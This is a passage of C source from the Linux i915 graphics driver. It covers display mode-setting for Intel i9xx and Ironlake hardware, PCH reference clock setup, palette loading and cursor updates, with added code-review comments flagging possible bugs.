		temp |= LVDS_PORT_EN | LVDS_A0A2_CLKA_POWER_UP;
		if (pipe == 1) {
			temp |= LVDS_PIPEB_SELECT;
		} else {
			temp &= ~LVDS_PIPEB_SELECT;
		}
		/* set the corresponding LVDS_BORDER bit */
		temp |= dev_priv->lvds_border_bits;
		/* Set the B0-B3 data pairs corresponding to whether we're going to
		 * set the DPLLs for dual-channel mode or not.
		 */
		if (clock.p2 == 7)
			temp |= LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP;
		else
			temp &= ~(LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP);

		/* It would be nice to set 24 vs 18-bit mode (LVDS_A3_POWER_UP)
		 * appropriately here, but we need to look more thoroughly into how
		 * panels behave in the two modes.
		 */
		/* set the dithering flag on LVDS as needed */
		if (INTEL_INFO(dev)->gen >= 4) {
			if (dev_priv->lvds_dither)
				temp |= LVDS_ENABLE_DITHER;
			else
				temp &= ~LVDS_ENABLE_DITHER;
		}
		if (adjusted_mode->flags & DRM_MODE_FLAG_NHSYNC)
			lvds_sync |= LVDS_HSYNC_POLARITY;
		if (adjusted_mode->flags & DRM_MODE_FLAG_NVSYNC)
			lvds_sync |= LVDS_VSYNC_POLARITY;
		if ((temp & (LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY))
		    != lvds_sync) {
			char flags[2] = "-+";
			DRM_INFO("Changing LVDS panel from "
				 "(%chsync, %cvsync) to (%chsync, %cvsync)\n",
				 flags[!(temp & LVDS_HSYNC_POLARITY)],
				 flags[!(temp & LVDS_VSYNC_POLARITY)],
				 flags[!(lvds_sync & LVDS_HSYNC_POLARITY)],
				 flags[!(lvds_sync & LVDS_VSYNC_POLARITY)]);
			temp &= ~(LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY);
			temp |= lvds_sync;
		}
		I915_WRITE(LVDS, temp);
	}

	if (is_dp) {
		intel_dp_set_m_n(crtc, mode, adjusted_mode);
	}

	I915_WRITE(DPLL(pipe), dpll);

	/* Wait for the clocks to stabilize. */
	POSTING_READ(DPLL(pipe));
	udelay(150);

	if (INTEL_INFO(dev)->gen >= 4) {
		temp = 0;
		if (is_sdvo) {
			temp = intel_mode_get_pixel_multiplier(adjusted_mode);
			if (temp > 1)
				temp = (temp - 1) << DPLL_MD_UDI_MULTIPLIER_SHIFT;
			else
				temp = 0;
		}
		I915_WRITE(DPLL_MD(pipe), temp);
	} else {
		/* The pixel multiplier can only be updated once the
		 * DPLL is enabled and the clocks are stable.
		 *
		 * So write it again.
		 */
		I915_WRITE(DPLL(pipe), dpll);
	}

	/* Program the downclocked divisors into FP1 when LVDS
	 * downclocking is usable, otherwise mirror FP0. */
	intel_crtc->lowfreq_avail = false;
	if (is_lvds && has_reduced_clock && i915_powersave) {
		I915_WRITE(FP1(pipe), fp2);
		intel_crtc->lowfreq_avail = true;
		if (HAS_PIPE_CXSR(dev)) {
			DRM_DEBUG_KMS("enabling CxSR downclocking\n");
			pipeconf |= PIPECONF_CXSR_DOWNCLOCK;
		}
	} else {
		I915_WRITE(FP1(pipe), fp);
		if (HAS_PIPE_CXSR(dev)) {
			DRM_DEBUG_KMS("disabling CxSR downclocking\n");
			pipeconf &= ~PIPECONF_CXSR_DOWNCLOCK;
		}
	}

	if (adjusted_mode->flags & DRM_MODE_FLAG_INTERLACE) {
		pipeconf |= PIPECONF_INTERLACE_W_FIELD_INDICATION;
		/* the chip adds 2 halflines automatically */
		adjusted_mode->crtc_vdisplay -= 1;
		adjusted_mode->crtc_vtotal -= 1;
		adjusted_mode->crtc_vblank_start -= 1;
		adjusted_mode->crtc_vblank_end -= 1;
		adjusted_mode->crtc_vsync_end -= 1;
		adjusted_mode->crtc_vsync_start -= 1;
	} else
		pipeconf &= ~PIPECONF_INTERLACE_W_FIELD_INDICATION; /* progressive */

	/* Pipe timing registers: all fields are (value - 1). */
	I915_WRITE(HTOTAL(pipe),
		   (adjusted_mode->crtc_hdisplay - 1) |
		   ((adjusted_mode->crtc_htotal - 1) << 16));
	I915_WRITE(HBLANK(pipe),
		   (adjusted_mode->crtc_hblank_start - 1) |
		   ((adjusted_mode->crtc_hblank_end - 1) << 16));
	I915_WRITE(HSYNC(pipe),
		   (adjusted_mode->crtc_hsync_start - 1) |
		   ((adjusted_mode->crtc_hsync_end - 1) << 16));
	I915_WRITE(VTOTAL(pipe),
		   (adjusted_mode->crtc_vdisplay - 1) |
		   ((adjusted_mode->crtc_vtotal - 1) << 16));
	I915_WRITE(VBLANK(pipe),
		   (adjusted_mode->crtc_vblank_start - 1) |
		   ((adjusted_mode->crtc_vblank_end - 1) << 16));
	I915_WRITE(VSYNC(pipe),
		   (adjusted_mode->crtc_vsync_start - 1) |
		   ((adjusted_mode->crtc_vsync_end - 1) << 16));

	/* pipesrc and dspsize control the size that is scaled from,
	 * which should always be the user's requested size.
	 */
	I915_WRITE(DSPSIZE(plane),
		   ((mode->vdisplay - 1) << 16) |
		   (mode->hdisplay - 1));
	I915_WRITE(DSPPOS(plane), 0);
	I915_WRITE(PIPESRC(pipe),
		   ((mode->hdisplay - 1) << 16) | (mode->vdisplay - 1));

	I915_WRITE(PIPECONF(pipe), pipeconf);
	POSTING_READ(PIPECONF(pipe));
	intel_enable_pipe(dev_priv, pipe, false);

	intel_wait_for_vblank(dev, pipe);

	I915_WRITE(DSPCNTR(plane), dspcntr);
	POSTING_READ(DSPCNTR(plane));
	intel_enable_plane(dev_priv, plane, pipe);

	ret = intel_pipe_set_base(crtc, x, y, old_fb);

	intel_update_watermarks(dev);

	return ret;
}
/*
 * Reconfigure the PCH display reference clock (PCH_DREF_CONTROL) based on
 * which encoders are currently driving enabled CRTCs.  Always enables the
 * non-spread source; additionally programs the SSC source and the CPU
 * source output when an eDP encoder is active.
 *
 * Each register write is posted and followed by a 200us settle delay, per
 * the documented bring-up sequence.
 */
static void ironlake_update_pch_refclk(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_mode_config *mode_config = &dev->mode_config;
	struct drm_crtc *crtc;
	struct intel_encoder *encoder;
	struct intel_encoder *has_edp_encoder = NULL;
	u32 temp;
	bool has_lvds = false;	/* NOTE(review): set below but never read here */

	/* We need to take the global config into account */
	list_for_each_entry(crtc, &mode_config->crtc_list, head) {
		if (!crtc->enabled)
			continue;

		/* Scan encoders attached to this enabled CRTC. */
		list_for_each_entry(encoder, &mode_config->encoder_list,
				    base.head) {
			if (encoder->base.crtc != crtc)
				continue;

			switch (encoder->type) {
			case INTEL_OUTPUT_LVDS:
				has_lvds = true;
				/* fall through — LVDS also records the encoder;
				 * TODO confirm this fallthrough is intentional */
			case INTEL_OUTPUT_EDP:
				has_edp_encoder = encoder;
				break;
			}
		}
	}

	/* Ironlake: try to setup display ref clock before DPLL
	 * enabling. This is only under driver's control after
	 * PCH B stepping, previous chipset stepping should be
	 * ignoring this setting.
	 */
	temp = I915_READ(PCH_DREF_CONTROL);
	/* Always enable nonspread source */
	temp &= ~DREF_NONSPREAD_SOURCE_MASK;
	temp |= DREF_NONSPREAD_SOURCE_ENABLE;
	temp &= ~DREF_SSC_SOURCE_MASK;
	temp |= DREF_SSC_SOURCE_ENABLE;
	I915_WRITE(PCH_DREF_CONTROL, temp);

	POSTING_READ(PCH_DREF_CONTROL);
	udelay(200);

	if (has_edp_encoder) {
		if (intel_panel_use_ssc(dev_priv)) {
			/* Turn on SSC1 before routing it anywhere. */
			temp |= DREF_SSC1_ENABLE;
			I915_WRITE(PCH_DREF_CONTROL, temp);

			POSTING_READ(PCH_DREF_CONTROL);
			udelay(200);
		}
		temp &= ~DREF_CPU_SOURCE_OUTPUT_MASK;

		/* Enable CPU source on CPU attached eDP */
		if (!intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
			if (intel_panel_use_ssc(dev_priv))
				temp |= DREF_CPU_SOURCE_OUTPUT_DOWNSPREAD;
			else
				temp |= DREF_CPU_SOURCE_OUTPUT_NONSPREAD;
		} else {
			/* Enable SSC on PCH eDP if needed */
			if (intel_panel_use_ssc(dev_priv)) {
				/* NOTE(review): DRM_ERROR looks over-loud for a
				 * normal configuration path — DRM_DEBUG_KMS would
				 * match the messages above; verify intent. */
				DRM_ERROR("enabling SSC on PCH\n");
				temp |= DREF_SUPERSPREAD_SOURCE_ENABLE;
			}
		}

		I915_WRITE(PCH_DREF_CONTROL, temp);
		POSTING_READ(PCH_DREF_CONTROL);
		udelay(200);
	}
}
/*
 * Full mode-set for one CRTC on PCH-split (Ironlake+) hardware.
 *
 * Sequence: classify attached encoders, choose a reference clock and PLL
 * divisors, compute FDI link M/N values, program the PCH DPLL, the LVDS
 * port, dithering, pipe timings and finally the display plane.
 *
 * @crtc:          CRTC being configured
 * @mode:          user-requested mode (pipe source size comes from here)
 * @adjusted_mode: encoder-adjusted mode (hardware timings come from here;
 *                 modified in place for interlaced modes, see below)
 * @x, @y:         plane panning offset
 * @old_fb:        previous framebuffer, handed to intel_pipe_set_base()
 *
 * Returns 0 on success, -EINVAL if no PLL divisors fit, or the error from
 * intel_pipe_set_base().
 */
static int ironlake_crtc_mode_set(struct drm_crtc *crtc,
				  struct drm_display_mode *mode,
				  struct drm_display_mode *adjusted_mode,
				  int x, int y,
				  struct drm_framebuffer *old_fb)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;
	int refclk, num_connectors = 0;
	intel_clock_t clock, reduced_clock;
	u32 dpll, fp = 0, fp2 = 0, dspcntr, pipeconf;
	bool ok, has_reduced_clock = false, is_sdvo = false;
	bool is_crt = false, is_lvds = false, is_tv = false, is_dp = false;
	struct intel_encoder *has_edp_encoder = NULL;
	struct drm_mode_config *mode_config = &dev->mode_config;
	struct intel_encoder *encoder;
	const intel_limit_t *limit;
	int ret;
	struct fdi_m_n m_n = {0};
	u32 temp;
	u32 lvds_sync = 0;
	int target_clock, pixel_multiplier, lane, link_bw, factor;
	unsigned int pipe_bpp;
	bool dither;

	/* Classify every encoder attached to this CRTC; the flags steer
	 * PLL selection and port programming below. */
	list_for_each_entry(encoder, &mode_config->encoder_list, base.head) {
		if (encoder->base.crtc != crtc)
			continue;

		switch (encoder->type) {
		case INTEL_OUTPUT_LVDS:
			is_lvds = true;
			break;
		case INTEL_OUTPUT_SDVO:
		case INTEL_OUTPUT_HDMI:
			is_sdvo = true;
			if (encoder->needs_tv_clock)
				is_tv = true;
			break;
		case INTEL_OUTPUT_TVOUT:
			is_tv = true;
			break;
		case INTEL_OUTPUT_ANALOG:
			is_crt = true;
			break;
		case INTEL_OUTPUT_DISPLAYPORT:
			is_dp = true;
			break;
		case INTEL_OUTPUT_EDP:
			has_edp_encoder = encoder;
			break;
		}

		num_connectors++;
	}

	/* Reference clock selection: SSC for a lone LVDS panel (kHz value
	 * from VBT, despite the "MHz" in the debug string), else 96/120MHz. */
	if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2) {
		refclk = dev_priv->lvds_ssc_freq * 1000;
		DRM_DEBUG_KMS("using SSC reference clock of %d MHz\n",
			      refclk / 1000);
	} else {
		refclk = 96000;
		if (!has_edp_encoder ||
		    intel_encoder_is_pch_edp(&has_edp_encoder->base))
			refclk = 120000; /* 120Mhz refclk */
	}

	/*
	 * Returns a set of divisors for the desired target clock with the given
	 * refclk, or FALSE.  The returned values represent the clock equation:
	 * reflck * (5 * (m1 + 2) + (m2 + 2)) / (n + 2) / p1 / p2.
	 */
	limit = intel_limit(crtc, refclk);
	ok = limit->find_pll(limit, crtc, adjusted_mode->clock, refclk, &clock);
	if (!ok) {
		DRM_ERROR("Couldn't find PLL settings for mode!\n");
		return -EINVAL;
	}

	/* Ensure that the cursor is valid for the new mode before changing... */
	intel_crtc_update_cursor(crtc, true);

	/* Try to find divisors for the LVDS downclock frequency as well;
	 * only usable if it shares P with the primary clock (FP0/FP1 swap). */
	if (is_lvds && dev_priv->lvds_downclock_avail) {
		has_reduced_clock = limit->find_pll(limit, crtc,
						    dev_priv->lvds_downclock,
						    refclk,
						    &reduced_clock);
		if (has_reduced_clock && (clock.p != reduced_clock.p)) {
			/*
			 * If the different P is found, it means that we can't
			 * switch the display clock by using the FP0/FP1.
			 * In such case we will disable the LVDS downclock
			 * feature.
			 */
			DRM_DEBUG_KMS("Different P is found for "
				      "LVDS clock/downclock\n");
			has_reduced_clock = 0;
		}
	}
	/* SDVO TV has fixed PLL values depend on its clock range,
	   this mirrors vbios setting. */
	if (is_sdvo && is_tv) {
		if (adjusted_mode->clock >= 100000
		    && adjusted_mode->clock < 140500) {
			clock.p1 = 2;
			clock.p2 = 10;
			clock.n = 3;
			clock.m1 = 16;
			clock.m2 = 8;
		} else if (adjusted_mode->clock >= 140500
			   && adjusted_mode->clock <= 200000) {
			clock.p1 = 1;
			clock.p2 = 10;
			clock.n = 6;
			clock.m1 = 12;
			clock.m2 = 8;
		}
	}

	/* FDI link */
	pixel_multiplier = intel_mode_get_pixel_multiplier(adjusted_mode);
	lane = 0;
	/* CPU eDP doesn't require FDI link, so just set DP M/N
	   according to current link config */
	if (has_edp_encoder &&
	    !intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
		target_clock = mode->clock;
		intel_edp_link_config(has_edp_encoder,
				      &lane, &link_bw);
	} else {
		/* [e]DP over FDI requires target mode clock
		   instead of link clock */
		/* NOTE(review): has_edp_encoder may be NULL here when !is_dp;
		 * &has_edp_encoder->base is then derived from a NULL pointer —
		 * verify intel_encoder_is_pch_edp() tolerates that. */
		if (is_dp || intel_encoder_is_pch_edp(&has_edp_encoder->base))
			target_clock = mode->clock;
		else
			target_clock = adjusted_mode->clock;

		/* FDI is a binary signal running at ~2.7GHz, encoding
		 * each output octet as 10 bits. The actual frequency
		 * is stored as a divider into a 100MHz clock, and the
		 * mode pixel clock is stored in units of 1KHz.
		 * Hence the bw of each lane in terms of the mode signal
		 * is:
		 */
		link_bw = intel_fdi_link_freq(dev) * MHz(100)/KHz(1)/10;
	}

	/* determine panel color depth */
	temp = I915_READ(PIPECONF(pipe));
	temp &= ~PIPE_BPC_MASK;
	dither = intel_choose_pipe_bpp_dither(crtc, &pipe_bpp);
	switch (pipe_bpp) {
	case 18:
		temp |= PIPE_6BPC;
		break;
	case 24:
		temp |= PIPE_8BPC;
		break;
	case 30:
		temp |= PIPE_10BPC;
		break;
	case 36:
		temp |= PIPE_12BPC;
		break;
	default:
		WARN(1, "intel_choose_pipe_bpp returned invalid value %d\n",
			pipe_bpp);
		temp |= PIPE_8BPC;
		pipe_bpp = 24;
		break;
	}

	intel_crtc->bpp = pipe_bpp;
	I915_WRITE(PIPECONF(pipe), temp);

	if (!lane) {
		/*
		 * Account for spread spectrum to avoid
		 * oversubscribing the link. Max center spread
		 * is 2.5%; use 5% for safety's sake.
		 */
		u32 bps = target_clock * intel_crtc->bpp * 21 / 20;
		lane = bps / (link_bw * 8) + 1;
	}

	intel_crtc->fdi_lanes = lane;

	if (pixel_multiplier > 1)
		link_bw *= pixel_multiplier;
	ironlake_compute_m_n(intel_crtc->bpp, lane, target_clock, link_bw,
			     &m_n);

	ironlake_update_pch_refclk(dev);

	fp = clock.n << 16 | clock.m1 << 8 | clock.m2;
	if (has_reduced_clock)
		fp2 = reduced_clock.n << 16 | reduced_clock.m1 << 8 |
			reduced_clock.m2;

	/* Enable autotuning of the PLL clock (if permissible) */
	factor = 21;
	if (is_lvds) {
		if ((intel_panel_use_ssc(dev_priv) &&
		     dev_priv->lvds_ssc_freq == 100) ||
		    (I915_READ(PCH_LVDS) & LVDS_CLKB_POWER_MASK) == LVDS_CLKB_POWER_UP)
			factor = 25;
	} else if (is_sdvo && is_tv)
		factor = 20;

	if (clock.m < factor * clock.n)
		fp |= FP_CB_TUNE;

	dpll = 0;

	if (is_lvds)
		dpll |= DPLLB_MODE_LVDS;
	else
		dpll |= DPLLB_MODE_DAC_SERIAL;
	if (is_sdvo) {
		/* NOTE(review): this shadows the outer pixel_multiplier —
		 * same value, but the inner declaration is redundant. */
		int pixel_multiplier = intel_mode_get_pixel_multiplier(adjusted_mode);
		if (pixel_multiplier > 1) {
			dpll |= (pixel_multiplier - 1) << PLL_REF_SDVO_HDMI_MULTIPLIER_SHIFT;
		}
		dpll |= DPLL_DVO_HIGH_SPEED;
	}
	/* NOTE(review): same possible NULL has_edp_encoder deref as above. */
	if (is_dp || intel_encoder_is_pch_edp(&has_edp_encoder->base))
		dpll |= DPLL_DVO_HIGH_SPEED;

	/* compute bitmask from p1 value */
	dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT;
	/* also FPA1 */
	dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA1_P1_POST_DIV_SHIFT;

	switch (clock.p2) {
	case 5:
		dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_5;
		break;
	case 7:
		dpll |= DPLLB_LVDS_P2_CLOCK_DIV_7;
		break;
	case 10:
		dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_10;
		break;
	case 14:
		dpll |= DPLLB_LVDS_P2_CLOCK_DIV_14;
		break;
	}

	if (is_sdvo && is_tv)
		dpll |= PLL_REF_INPUT_TVCLKINBC;
	else if (is_tv)
		/* XXX: just matching BIOS for now */
		/*	dpll |= PLL_REF_INPUT_TVCLKINBC; */
		dpll |= 3;
	else if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2)
		dpll |= PLLB_REF_INPUT_SPREADSPECTRUMIN;
	else
		dpll |= PLL_REF_INPUT_DREFCLK;

	/* setup pipeconf */
	pipeconf = I915_READ(PIPECONF(pipe));

	/* Set up the display plane register */
	dspcntr = DISPPLANE_GAMMA_ENABLE;

	/* NOTE(review): prints 'B' for pipe 2 as well — pipe C exists on
	 * this hardware (see the PCH_DPLL_SEL switch below). */
	DRM_DEBUG_KMS("Mode for pipe %c:\n", pipe == 0 ? 'A' : 'B');
	drm_mode_debug_printmodeline(mode);

	/* PCH eDP needs FDI, but CPU eDP does not */
	if (!has_edp_encoder || intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
		I915_WRITE(PCH_FP0(pipe), fp);
		I915_WRITE(PCH_DPLL(pipe), dpll & ~DPLL_VCO_ENABLE);

		POSTING_READ(PCH_DPLL(pipe));
		udelay(150);
	}

	/* enable transcoder DPLL */
	if (HAS_PCH_CPT(dev)) {
		temp = I915_READ(PCH_DPLL_SEL);
		switch (pipe) {
		case 0:
			temp |= TRANSA_DPLL_ENABLE | TRANSA_DPLLA_SEL;
			break;
		case 1:
			temp |= TRANSB_DPLL_ENABLE | TRANSB_DPLLB_SEL;
			break;
		case 2:
			/* FIXME: manage transcoder PLLs? */
			temp |= TRANSC_DPLL_ENABLE | TRANSC_DPLLB_SEL;
			break;
		default:
			BUG();
		}
		I915_WRITE(PCH_DPLL_SEL, temp);

		POSTING_READ(PCH_DPLL_SEL);
		udelay(150);
	}

	/* The LVDS pin pair needs to be on before the DPLLs are enabled.
	 * This is an exception to the general rule that mode_set doesn't turn
	 * things on.
	 */
	if (is_lvds) {
		temp = I915_READ(PCH_LVDS);
		temp |= LVDS_PORT_EN | LVDS_A0A2_CLKA_POWER_UP;
		if (pipe == 1) {
			if (HAS_PCH_CPT(dev))
				temp |= PORT_TRANS_B_SEL_CPT;
			else
				temp |= LVDS_PIPEB_SELECT;
		} else {
			if (HAS_PCH_CPT(dev))
				temp &= ~PORT_TRANS_SEL_MASK;
			else
				temp &= ~LVDS_PIPEB_SELECT;
		}
		/* set the corresponsding LVDS_BORDER bit */
		temp |= dev_priv->lvds_border_bits;
		/* Set the B0-B3 data pairs corresponding to whether we're going to
		 * set the DPLLs for dual-channel mode or not.
		 */
		if (clock.p2 == 7)
			temp |= LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP;
		else
			temp &= ~(LVDS_B0B3_POWER_UP | LVDS_CLKB_POWER_UP);

		/* It would be nice to set 24 vs 18-bit mode (LVDS_A3_POWER_UP)
		 * appropriately here, but we need to look more thoroughly into how
		 * panels behave in the two modes.
		 */
		if (adjusted_mode->flags & DRM_MODE_FLAG_NHSYNC)
			lvds_sync |= LVDS_HSYNC_POLARITY;
		if (adjusted_mode->flags & DRM_MODE_FLAG_NVSYNC)
			lvds_sync |= LVDS_VSYNC_POLARITY;
		if ((temp & (LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY))
		    != lvds_sync) {
			/* deliberately no terminating NUL: only indexed, never
			 * printed as a string */
			char flags[2] = "-+";
			DRM_INFO("Changing LVDS panel from "
				 "(%chsync, %cvsync) to (%chsync, %cvsync)\n",
				 flags[!(temp & LVDS_HSYNC_POLARITY)],
				 flags[!(temp & LVDS_VSYNC_POLARITY)],
				 flags[!(lvds_sync & LVDS_HSYNC_POLARITY)],
				 flags[!(lvds_sync & LVDS_VSYNC_POLARITY)]);
			temp &= ~(LVDS_HSYNC_POLARITY | LVDS_VSYNC_POLARITY);
			temp |= lvds_sync;
		}
		I915_WRITE(PCH_LVDS, temp);
	}

	pipeconf &= ~PIPECONF_DITHER_EN;
	pipeconf &= ~PIPECONF_DITHER_TYPE_MASK;
	if ((is_lvds && dev_priv->lvds_dither) || dither) {
		pipeconf |= PIPECONF_DITHER_EN;
		pipeconf |= PIPECONF_DITHER_TYPE_ST1;
	}
	/* NOTE(review): same possible NULL has_edp_encoder deref as above. */
	if (is_dp || intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
		intel_dp_set_m_n(crtc, mode, adjusted_mode);
	} else {
		/* For non-DP output, clear any trans DP clock recovery setting.*/
		I915_WRITE(TRANSDATA_M1(pipe), 0);
		I915_WRITE(TRANSDATA_N1(pipe), 0);
		I915_WRITE(TRANSDPLINK_M1(pipe), 0);
		I915_WRITE(TRANSDPLINK_N1(pipe), 0);
	}

	if (!has_edp_encoder ||
	    intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
		I915_WRITE(PCH_DPLL(pipe), dpll);

		/* Wait for the clocks to stabilize. */
		POSTING_READ(PCH_DPLL(pipe));
		udelay(150);

		/* The pixel multiplier can only be updated once the
		 * DPLL is enabled and the clocks are stable.
		 *
		 * So write it again.
		 */
		I915_WRITE(PCH_DPLL(pipe), dpll);
	}

	intel_crtc->lowfreq_avail = false;
	if (is_lvds && has_reduced_clock && i915_powersave) {
		I915_WRITE(PCH_FP1(pipe), fp2);
		intel_crtc->lowfreq_avail = true;
		if (HAS_PIPE_CXSR(dev)) {
			DRM_DEBUG_KMS("enabling CxSR downclocking\n");
			pipeconf |= PIPECONF_CXSR_DOWNCLOCK;
		}
	} else {
		I915_WRITE(PCH_FP1(pipe), fp);
		if (HAS_PIPE_CXSR(dev)) {
			DRM_DEBUG_KMS("disabling CxSR downclocking\n");
			pipeconf &= ~PIPECONF_CXSR_DOWNCLOCK;
		}
	}

	/* Interlaced modes mutate the caller's adjusted_mode timings. */
	if (adjusted_mode->flags & DRM_MODE_FLAG_INTERLACE) {
		pipeconf |= PIPECONF_INTERLACE_W_FIELD_INDICATION;
		/* the chip adds 2 halflines automatically */
		adjusted_mode->crtc_vdisplay -= 1;
		adjusted_mode->crtc_vtotal -= 1;
		adjusted_mode->crtc_vblank_start -= 1;
		adjusted_mode->crtc_vblank_end -= 1;
		adjusted_mode->crtc_vsync_end -= 1;
		adjusted_mode->crtc_vsync_start -= 1;
	} else
		pipeconf &= ~PIPECONF_INTERLACE_W_FIELD_INDICATION; /* progressive */

	/* Pipe timing registers hold value-minus-one: active/start in the
	 * low word, total/end in the high word. */
	I915_WRITE(HTOTAL(pipe),
		   (adjusted_mode->crtc_hdisplay - 1) |
		   ((adjusted_mode->crtc_htotal - 1) << 16));
	I915_WRITE(HBLANK(pipe),
		   (adjusted_mode->crtc_hblank_start - 1) |
		   ((adjusted_mode->crtc_hblank_end - 1) << 16));
	I915_WRITE(HSYNC(pipe),
		   (adjusted_mode->crtc_hsync_start - 1) |
		   ((adjusted_mode->crtc_hsync_end - 1) << 16));
	I915_WRITE(VTOTAL(pipe),
		   (adjusted_mode->crtc_vdisplay - 1) |
		   ((adjusted_mode->crtc_vtotal - 1) << 16));
	I915_WRITE(VBLANK(pipe),
		   (adjusted_mode->crtc_vblank_start - 1) |
		   ((adjusted_mode->crtc_vblank_end - 1) << 16));
	I915_WRITE(VSYNC(pipe),
		   (adjusted_mode->crtc_vsync_start - 1) |
		   ((adjusted_mode->crtc_vsync_end - 1) << 16));

	/* pipesrc controls the size that is scaled from, which should
	 * always be the user's requested size.
	 */
	I915_WRITE(PIPESRC(pipe),
		   ((mode->hdisplay - 1) << 16) | (mode->vdisplay - 1));

	I915_WRITE(PIPE_DATA_M1(pipe), TU_SIZE(m_n.tu) | m_n.gmch_m);
	I915_WRITE(PIPE_DATA_N1(pipe), m_n.gmch_n);
	I915_WRITE(PIPE_LINK_M1(pipe), m_n.link_m);
	I915_WRITE(PIPE_LINK_N1(pipe), m_n.link_n);

	if (has_edp_encoder &&
	    !intel_encoder_is_pch_edp(&has_edp_encoder->base)) {
		ironlake_set_pll_edp(crtc, adjusted_mode->clock);
	}

	I915_WRITE(PIPECONF(pipe), pipeconf);
	POSTING_READ(PIPECONF(pipe));

	intel_wait_for_vblank(dev, pipe);

	if (IS_GEN5(dev)) {
		/* enable address swizzle for tiling buffer */
		temp = I915_READ(DISP_ARB_CTL);
		I915_WRITE(DISP_ARB_CTL, temp | DISP_TILE_SURFACE_SWIZZLING);
	}

	I915_WRITE(DSPCNTR(plane), dspcntr);
	POSTING_READ(DSPCNTR(plane));

	ret = intel_pipe_set_base(crtc, x, y, old_fb);

	intel_update_watermarks(dev);

	return ret;
}
/*
 * Common CRTC mode-set entry point: brackets the generation-specific
 * crtc_mode_set hook with vblank pre/post bookkeeping and marks the
 * CRTC's DPMS state as on.  Returns whatever the hook returns.
 */
static int intel_crtc_mode_set(struct drm_crtc *crtc,
			       struct drm_display_mode *mode,
			       struct drm_display_mode *adjusted_mode,
			       int x, int y,
			       struct drm_framebuffer *old_fb)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int ret;

	drm_vblank_pre_modeset(dev, pipe);

	ret = dev_priv->display.crtc_mode_set(crtc, mode, adjusted_mode,
					      x, y, old_fb);

	drm_vblank_post_modeset(dev, pipe);

	/* NOTE(review): dpms_mode is set to ON even when the hook failed. */
	intel_crtc->dpms_mode = DRM_MODE_DPMS_ON;

	return ret;
}
/** Loads the palette/gamma unit for the CRTC with the prepared values */
void intel_crtc_load_lut(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int palreg = PALETTE(intel_crtc->pipe);
int i;
/* The clocks have to be on to load the palette. */
if (!crtc->enabled)
return;
/* use legacy palette for Ironlake */
if (HAS_PCH_SPLIT(dev))
palreg = LGC_PALETTE(intel_crtc->pipe);
for (i = 0; i < 256; i++) {
I915_WRITE(palreg + 4 * i,
(intel_crtc->lut_r[i] << 16) |
(intel_crtc->lut_g[i] << 8) |
intel_crtc->lut_b[i]);
}
}
/*
 * Show or hide the hardware cursor on i845/i865-class hardware.
 * @base is the GTT/phys address of the cursor image; 0 means hide.
 * Only acts on visibility transitions; the base register may only be
 * written while the cursor is disabled on these chipsets.
 */
static void i845_update_cursor(struct drm_crtc *crtc, u32 base)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	bool visible = base != 0;
	u32 cntl;

	if (intel_crtc->cursor_visible == visible)
		return;

	cntl = I915_READ(_CURACNTR);
	if (visible) {
		/* On these chipsets we can only modify the base whilst
		 * the cursor is disabled.
		 */
		I915_WRITE(_CURABASE, base);

		cntl &= ~(CURSOR_FORMAT_MASK);
		/* XXX width must be 64, stride 256 => 0x00 << 28 */
		cntl |= CURSOR_ENABLE |
			CURSOR_GAMMA_ENABLE |
			CURSOR_FORMAT_ARGB;
	} else
		cntl &= ~(CURSOR_ENABLE | CURSOR_GAMMA_ENABLE);
	I915_WRITE(_CURACNTR, cntl);

	intel_crtc->cursor_visible = visible;
}
/*
 * Program the cursor for i9xx-class hardware.  The control register is
 * only rewritten on visibility transitions; the base address write at
 * the end latches all changes on the next vblank.
 */
static void i9xx_update_cursor(struct drm_crtc *crtc, u32 base)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	bool visible = base != 0;

	if (intel_crtc->cursor_visible != visible) {
		uint32_t cntl = I915_READ(CURCNTR(pipe));
		if (base) {
			cntl &= ~(CURSOR_MODE | MCURSOR_PIPE_SELECT);
			cntl |= CURSOR_MODE_64_ARGB_AX | MCURSOR_GAMMA_ENABLE;
			cntl |= pipe << 28; /* Connect to correct pipe */
		} else {
			cntl &= ~(CURSOR_MODE | MCURSOR_GAMMA_ENABLE);
			cntl |= CURSOR_MODE_DISABLE;
		}
		I915_WRITE(CURCNTR(pipe), cntl);

		intel_crtc->cursor_visible = visible;
	}
	/* and commit changes on next vblank */
	I915_WRITE(CURBASE(pipe), base);
}
/*
 * Ivybridge variant of the cursor update: same structure as
 * i9xx_update_cursor() but uses the IVB register offsets and has no
 * pipe-select bits in the control register.
 */
static void ivb_update_cursor(struct drm_crtc *crtc, u32 base)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
